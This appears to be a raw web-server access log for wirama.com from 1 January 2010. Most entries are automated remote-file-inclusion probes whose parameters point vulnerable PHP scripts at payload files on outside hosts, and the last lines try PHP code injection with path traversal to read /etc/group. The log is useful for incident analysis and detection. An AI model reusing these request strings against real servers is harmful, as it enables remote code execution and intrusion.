87.250.255.243 - - [01/Jan/2010:01:24:54 -0800] "GET /logs/access_090801.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:01:27:11 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:27:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:27:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:27:35 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.136 - - [01/Jan/2010:01:27:43 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.135 - - [01/Jan/2010:01:28:17 -0800] "GET /logs/access_091031.log HTTP/1.1" 200 65536 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:29:55 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:32:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:32:43 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:32:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
196.34.92.6 - - [01/Jan/2010:01:33:54 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
196.34.92.6 - - [01/Jan/2010:01:33:54 -0800] "GET /include/prodler.class.php?sPath=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
196.34.92.6 - - [01/Jan/2010:01:35:34 -0800] "GET /include/prodler.class.php?sPath=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.wirama.com"
196.34.92.6 - - [01/Jan/2010:01:40:00 -0800] "GET /include/prodler.class.php?sPath=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:40:02 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:40:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:40:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
196.34.92.6 - - [01/Jan/2010:01:40:34 -0800] "GET /include/prodler.class.php?sPath=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:40:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:40:36 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:01:40:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
196.34.92.6 - - [01/Jan/2010:01:41:42 -0800] "GET /include/prodler.class.php?sPath=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.wirama.com"
196.34.92.6 - - [01/Jan/2010:01:41:49 -0800] "GET /include/prodler.class.php?sPath=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
91.206.206.28 - - [01/Jan/2010:01:46:52 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.206.206.28 - - [01/Jan/2010:01:46:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.206.206.28 - - [01/Jan/2010:01:46:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.206.206.28 - - [01/Jan/2010:01:46:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.206.206.28 - - [01/Jan/2010:01:46:53 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.206.206.28 - - [01/Jan/2010:01:46:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
196.34.92.6 - - [01/Jan/2010:01:55:32 -0800] "GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
196.34.92.6 - - [01/Jan/2010:01:55:32 -0800] "GET /logs//lib/Loggix/Module/Comment.php?pathToIndex=http://www.js2023.pl/images/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:30 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:01:58:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:01:58:34 -0800] "GET /skin/zero_vote/error.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:01:58:34 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:35 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:36 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:39 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:45 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:48 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:58:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:59:19 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:01:59:21 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:02:03:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:02:03:55 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:02:03:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:02:03:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:02:03:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.228.29.70 - - [01/Jan/2010:02:03:56 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:02:07:49 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.181 - - [01/Jan/2010:02:13:20 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
89.151.114.34 - - [01/Jan/2010:02:13:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:02:13:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:02:13:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:02:13:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:02:13:52 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:02:13:52 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.64.117 - - [01/Jan/2010:02:13:54 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.64.117 - - [01/Jan/2010:02:13:54 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.64.117 - - [01/Jan/2010:02:13:54 -0800] "GET /logs/access_091101.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.64.117 - - [01/Jan/2010:02:13:57 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.64.117 - - [01/Jan/2010:02:13:57 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.64.117 - - [01/Jan/2010:02:13:57 -0800] "GET /logs/access_091101.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:02:14:01 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:02:14:02 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.181 - - [01/Jan/2010:02:14:17 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
70.38.64.117 - - [01/Jan/2010:02:15:21 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.64.117 - - [01/Jan/2010:02:15:28 -0800] "GET /logs/access_091031.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [01/Jan/2010:02:20:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [01/Jan/2010:02:21:59 -0800] "GET /logs/access_090329.log//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:21:59 -0800] "GET /?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:21:59 -0800] "GET /logs//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 3803 "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [01/Jan/2010:02:22:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [01/Jan/2010:02:22:30 -0800] "GET /logs//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 3803 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:22:30 -0800] "GET /logs/access_090329.log%20%20//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:22:30 -0800] "GET /?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [01/Jan/2010:02:23:05 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [01/Jan/2010:02:25:55 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [01/Jan/2010:02:26:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [01/Jan/2010:02:26:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [01/Jan/2010:02:28:22 -0800] "GET /logs/access_091031.log/netcat_files/?_SERVER[DOCUMENT_ROOT]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [01/Jan/2010:02:28:22 -0800] "GET /logs/netcat_files/?_SERVER[DOCUMENT_ROOT]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [01/Jan/2010:02:28:22 -0800] "GET /netcat_files/?_SERVER[DOCUMENT_ROOT]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [01/Jan/2010:02:31:19 -0800] "GET /logs/access_090330.log//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:32:14 -0800] "GET /logs/access_090329.log%20%20//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:32:14 -0800] "GET /?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:32:14 -0800] "GET /logs//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 3803 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:34:26 -0800] "GET /logs/access_090329.log%20%20//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:34:26 -0800] "GET /logs//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 3803 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:34:29 -0800] "GET /?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:39:26 -0800] "GET /logs/access_090329.log//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [01/Jan/2010:02:46:09 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [01/Jan/2010:02:46:59 -0800] "GET /logs/access_090330.log//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:48:20 -0800] "GET /logs/access_090329.log//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.227.136.155 - - [01/Jan/2010:02:55:12 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)" "www.wirama.com"
220.227.136.155 - - [01/Jan/2010:02:55:14 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)" "www.wirama.com"
220.227.136.155 - - [01/Jan/2010:02:55:17 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:02:56:00 -0800] "GET /logs/access_090330.log//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [01/Jan/2010:02:56:30 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.149.240.214 - - [01/Jan/2010:03:01:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "wirama.com"
62.149.240.214 - - [01/Jan/2010:03:01:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "wirama.com"
64.62.128.254 - - [01/Jan/2010:03:02:35 -0800] "GET /login.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:03:02:36 -0800] "GET /logs//login.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:03:02:36 -0800] "GET /logs/access_090601.log//login.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [01/Jan/2010:03:02:39 -0800] "GET /logs/access_090329.log//?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:03:02:41 -0800] "GET /logs//login.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:03:02:41 -0800] "GET /login.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:03:02:41 -0800] "GET /logs/access_090331.log//login.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:03:02:42 -0800] "GET /logs/access_090331.log//login.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:03:03:01 -0800] "GET /logs/access_090601.log//login.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
66.98.216.61 - - [01/Jan/2010:03:03:11 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:03:03:11 -0800] "GET /logs/access_090801.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
